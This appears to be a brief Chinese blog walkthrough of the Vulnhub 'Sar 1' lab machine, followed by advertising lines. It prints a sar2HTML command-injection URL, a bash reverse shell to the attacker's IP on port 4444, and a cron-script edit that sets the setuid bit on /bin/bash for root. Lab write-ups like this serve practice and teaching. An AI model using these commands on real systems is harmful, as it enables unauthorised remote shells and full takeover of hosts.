Vulnhub:Sar 1靶机
kali:192.168.111.111
靶机:192.168.111.130
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130
查看目标网站robots.txt,提示存在一个目录sar2HTML
访问sar2HTML目录发现是sar2HTML CMS
搜索后发现该CMS存在远程代码执行
searchsploit sar2HTML
漏洞利用
执行命令
http://192.168.111.130/sar2HTML/index.php?plot=;命令
反弹shell需要url编码
bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'
提权
查看目标计划任务,发现每5分钟以root身份执行/var/www/html/finally.sh
finally.sh会执行write.sh,而write.sh有777权限,修改write.sh提升为root
echo 'chmod 4777 /bin/bash' >> write.sh
/bin/bash -p
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步